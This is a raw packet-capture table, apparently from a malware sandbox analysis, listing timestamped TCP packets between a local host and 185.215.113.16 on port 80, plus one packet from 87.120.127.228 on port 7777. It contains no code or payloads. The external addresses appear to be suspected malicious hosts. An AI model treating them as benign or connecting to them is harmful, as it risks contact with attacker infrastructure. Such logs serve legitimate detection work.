Dec 14, 2024 23:58:37.285165071 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.285283089 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.285335064 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.286273003 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.286324978 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.286406994 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.286459923 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.287328005 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.287379980 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.287442923 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.287491083 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.288423061 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.288476944 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.288547039 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.288595915 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.289494991 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.289546013 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.289653063 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.289701939 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.290543079 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.290597916 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.290682077 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.290733099 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.291619062 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.291668892 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.291763067 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.291816950 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.292654037 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.292705059 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.292783022 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.292836905 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.293679953 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.293732882 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.293802977 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.293858051 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.294713020 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.294768095 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.294838905 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.294887066 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.295747042 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.295805931 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.295878887 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.295932055 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.296801090 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.296853065 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.296906948 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.296957970 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.297826052 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.297878027 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.297947884 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.297997952 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.298823118 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.298887014 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.298958063 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.299009085 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.299917936 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.299968958 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.300003052 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.300050974 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.300888062 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.300950050 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.301023006 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.301076889 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.301911116 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.301974058 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.302042961 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.302093983 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.303073883 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.303137064 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.303154945 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.303210020 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.303978920 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.304030895 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.304107904 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.304157972 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.305000067 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.305044889 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.305134058 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.305183887 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.306025028 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.306077003 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.306195974 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.306245089 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.307049036 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.307102919 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.307173014 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.307224035 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.308094978 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.308149099 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.308218956 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.308269024 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.309103966 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.309158087 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.309242964 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.309293032 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.310167074 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.310218096 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.310275078 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.310327053 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.311177969 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.311233997 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.311305046 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.311362028 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.312212944 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.312268972 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.312354088 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.312403917 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.313227892 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.313278913 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.313363075 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.313412905 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.314229012 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.314279079 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.314349890 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.314403057 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.315274000 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.315336943 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.315416098 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.315469027 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.316299915 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.316365957 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.316453934 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.316505909 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.317404032 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.317468882 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.317473888 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.317512989 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.318353891 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.318422079 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.318495989 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.318543911 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.319402933 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.319454908 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.319526911 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.319577932 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.320444107 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.320489883 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.320545912 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.320594072 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.321454048 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.321505070 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.321577072 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.321625948 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.322506905 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.322560072 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.322698116 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.322748899 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.323520899 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.323575974 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.323657036 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.323709965 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.324529886 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.324590921 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.324666023 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.324712038 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.325567961 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.325609922 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.325696945 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.325750113 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.326611996 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.326661110 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.462810040 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.462877035 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.462883949 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.462927103 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.463099957 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.463155985 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.463239908 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.463289976 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.464133978 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.464198112 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.464243889 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.464301109 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.465162992 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.465214014 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.465295076 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.465349913 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.466165066 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.466222048 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.466290951 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.466346025 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.467170000 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.467219114 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.467283964 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.467370987 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.468174934 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.468231916 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.468298912 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.468353033 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.469185114 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.469248056 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.469315052 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.469367981 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.470206976 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.470257998 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.470325947 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.470382929 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.471216917 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.471267939 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.471404076 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.471455097 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.472218037 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.472275019 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.472346067 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.472405910 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.473248959 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.473298073 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.473357916 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.473416090 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.474265099 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.474318981 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.474400043 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.474452972 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.475266933 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.475332022 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.475402117 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.475459099 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.476294041 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.476342916 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.476423979 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.476504087 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.477329969 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.477379084 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.477449894 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.477528095 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.478343010 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.478393078 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.478508949 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.478555918 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.479379892 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.479429007 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.479496956 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.479549885 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.480395079 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.480442047 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.480509043 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.480556011 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.481375933 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.481426954 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.481492043 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.481542110 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.482373953 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.482426882 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.482503891 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.482553959 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.483428001 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.483505964 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.483556032 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.483607054 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.484411001 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.484472990 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.484545946 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.484612942 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.485416889 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.485474110 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.485554934 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.485630035 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.486457109 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.486505985 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.486583948 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.486629963 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.487488985 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.487540960 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.487586975 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.487637997 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.488481045 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.488529921 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.488595963 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.488647938 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.489479065 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.489532948 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.489600897 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.489655018 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.490530014 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.490576982 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.490737915 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.490787029 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.491513968 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.491564989 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.491647005 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.491775036 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.492543936 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.492597103 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.492665052 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.492722034 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.493529081 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.493582010 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.493660927 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.493715048 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.494571924 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.494622946 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.494704962 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.494780064 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.495606899 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.495660067 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.495731115 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.495786905 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.496597052 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.496648073 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.496720076 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.496769905 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.497615099 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.497672081 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.497740030 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.497792006 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.498225927 CET	7777	49824	87.120.127.228	192.168.2.4
Dec 14, 2024 23:58:37.498627901 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.498687029 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.498771906 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.498825073 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.499653101 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.499794006 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.499876022 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.500674963 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.500722885 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.500794888 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.500842094 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.501689911 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.501743078 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.501815081 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.501882076 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.502697945 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.502742052 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.502821922 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.502880096 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.509514093 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.509572983 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.509658098 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.509694099 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.509721994 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.509741068 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.510155916 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.510188103 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.510212898 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.510222912 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.510234118 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.510268927 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.510818005 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.510850906 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.510875940 CET	49841	80	192.168.2.4	185.215.113.16
